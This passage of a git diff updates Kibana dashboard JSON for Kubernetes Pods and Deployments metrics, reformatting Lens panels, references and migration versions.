"preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "31f6a38e-250d-4a00-9f2a-af9c53aff800", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "72b97d6f-17f7-44b0-87a9-e272981c7565", - "w": 24, - "x": 0, - "y": 64 + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "72b97d6f-17f7-44b0-87a9-e272981c7565", - "title": "Network Incoming Bytes per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Pods", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-05-11T17:29:51.931Z", - "id": "kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:f30047fb-d7fd-4873-9150-6e16c369fcc8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:9486d409-e044-43b7-a175-e25695e38cc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:61027d7f-6398-4aec-b154-897b913481e4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "98677dcb-ab94-47e8-94ca-326470ee2380:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "98677dcb-ab94-47e8-94ca-326470ee2380:ace482cc-b33b-47c1-89b1-a710fe45195e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:81de779f-3d8f-4f90-9a93-08ecf5d96939", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:710b0f49-b955-4cb8-826e-e51b3e6e7271", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:31f6a38e-250d-4a00-9f2a-af9c53aff800", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_c08d3539-51f7-4256-861b-c3c323edfb86:optionsListDataView", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_4a85f45a-ea4c-4514-a71c-b15979915ce3:optionsListDataView", - "type": "index-pattern" - } + "title": "Network Incoming Bytes per Pod [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Pods", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:f30047fb-d7fd-4873-9150-6e16c369fcc8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:9486d409-e044-43b7-a175-e25695e38cc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:61027d7f-6398-4aec-b154-897b913481e4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "98677dcb-ab94-47e8-94ca-326470ee2380:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "98677dcb-ab94-47e8-94ca-326470ee2380:ace482cc-b33b-47c1-89b1-a710fe45195e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:81de779f-3d8f-4f90-9a93-08ecf5d96939", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:710b0f49-b955-4cb8-826e-e51b3e6e7271", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:31f6a38e-250d-4a00-9f2a-af9c53aff800", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c08d3539-51f7-4256-861b-c3c323edfb86:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4a85f45a-ea4c-4514-a71c-b15979915ce3:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json index da9ab17a533..ae09de03a49 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,926 +1,934 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"01b10632-f741-4099-981d-f1008020884b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"01b10632-f741-4099-981d-f1008020884b\",\"selectedOptions\":[],\"enhancements\":{}}},\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\",\"selectedOptions\":[],\"enhancements\":{}}},\"9e437628-d460-4697-9427-616333ef6947\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.deployment.name\",\"title\":\"Deployment Name\",\"id\":\"9e437628-d460-4697-9427-616333ef6947\",\"selectedOptions\":[],\"enhancements\":{}}}}" - }, - "description": "Metrics about Deployments", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NywyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"01b10632-f741-4099-981d-f1008020884b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"01b10632-f741-4099-981d-f1008020884b\",\"selectedOptions\":[],\"enhancements\":{}}},\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\",\"selectedOptions\":[],\"enhancements\":{}}},\"9e437628-d460-4697-9427-616333ef6947\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.deployment.name\",\"title\":\"Deployment Name\",\"id\":\"9e437628-d460-4697-9427-616333ef6947\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Deployments", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", - "type": "index-pattern" + "panelIndex": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f89abbc1-82fb-4d41-a11a-cf433264e823", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "611773bb-5ff9-4f08-ad80-de730b3bb8da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f89abbc1-82fb-4d41-a11a-cf433264e823": { + "columnOrder": [ + "97c9bb01-da79-4cd4-b196-0842bbb528b9", + "f96be551-98dc-415f-9179-6d589e1d226d" + ], + "columns": { + "97c9bb01-da79-4cd4-b196-0842bbb528b9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "611773bb-5ff9-4f08-ad80-de730b3bb8da", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f89abbc1-82fb-4d41-a11a-cf433264e823": { - "columnOrder": [ - "97c9bb01-da79-4cd4-b196-0842bbb528b9", - "f96be551-98dc-415f-9179-6d589e1d226d" - ], - "columns": { - "97c9bb01-da79-4cd4-b196-0842bbb528b9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "f96be551-98dc-415f-9179-6d589e1d226d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "611773bb-5ff9-4f08-ad80-de730b3bb8da", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "97c9bb01-da79-4cd4-b196-0842bbb528b9", - "collapseFn": "sum", - "layerId": "f89abbc1-82fb-4d41-a11a-cf433264e823", - "layerType": "data", - "metricAccessor": "f96be551-98dc-415f-9179-6d589e1d226d" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "f96be551-98dc-415f-9179-6d589e1d226d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "c2551403-dc87-4486-bcac-0b949508082e", - "w": 12, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "c2551403-dc87-4486-bcac-0b949508082e", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "611773bb-5ff9-4f08-ad80-de730b3bb8da", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "97c9bb01-da79-4cd4-b196-0842bbb528b9", + "collapseFn": "sum", + "layerId": "f89abbc1-82fb-4d41-a11a-cf433264e823", + "layerType": "data", + "metricAccessor": "f96be551-98dc-415f-9179-6d589e1d226d" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "type": "index-pattern" + "title": "Deployment Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "c2551403-dc87-4486-bcac-0b949508082e", + "w": 12, + "x": 0, + "y": 4 + }, + "panelIndex": "c2551403-dc87-4486-bcac-0b949508082e", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "899d30db-ab00-4a6f-9323-d4232f23735e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0f3d63e6-e7d7-45d7-acc1-13be66847b70": { + "columnOrder": [ + "0e87c556-3850-42b1-83ea-f1117f30b514", + "68619d2a-8ca3-4fab-a401-b6afe82f0b34" + ], + "columns": { + "0e87c556-3850-42b1-83ea-f1117f30b514": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "899d30db-ab00-4a6f-9323-d4232f23735e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0f3d63e6-e7d7-45d7-acc1-13be66847b70": { - "columnOrder": [ - "0e87c556-3850-42b1-83ea-f1117f30b514", - "68619d2a-8ca3-4fab-a401-b6afe82f0b34" - ], - "columns": { - "0e87c556-3850-42b1-83ea-f1117f30b514": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - }, - "68619d2a-8ca3-4fab-a401-b6afe82f0b34": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.deployment.replicas.available\": *" - }, - "isBucketed": false, - "label": "Replicas Available ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.deployment.replicas.available" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "899d30db-ab00-4a6f-9323-d4232f23735e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "0e87c556-3850-42b1-83ea-f1117f30b514", - "collapseFn": "sum", - "layerId": "0f3d63e6-e7d7-45d7-acc1-13be66847b70", - "layerType": "data", - "metricAccessor": "68619d2a-8ca3-4fab-a401-b6afe82f0b34" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" }, - "title": "Deployment Replicas Available [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "68619d2a-8ca3-4fab-a401-b6afe82f0b34": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.deployment.replicas.available\": *" + }, + "isBucketed": false, + "label": "Replicas Available ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.deployment.replicas.available" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "51e54a67-b167-49a2-95e6-e758a953a7e8", - "w": 12, - "x": 12, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "51e54a67-b167-49a2-95e6-e758a953a7e8", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "899d30db-ab00-4a6f-9323-d4232f23735e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "0e87c556-3850-42b1-83ea-f1117f30b514", + "collapseFn": "sum", + "layerId": "0f3d63e6-e7d7-45d7-acc1-13be66847b70", + "layerType": "data", + "metricAccessor": "68619d2a-8ca3-4fab-a401-b6afe82f0b34" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", - "type": "index-pattern" + "title": "Deployment Replicas Available [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "51e54a67-b167-49a2-95e6-e758a953a7e8", + "w": 12, + "x": 12, + "y": 4 + }, + "panelIndex": "51e54a67-b167-49a2-95e6-e758a953a7e8", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0a77b34d-ac0b-448e-9d8e-af8dbe4cebd6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78f09db9-67c3-40f1-93c7-9ba2b8ca8299", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 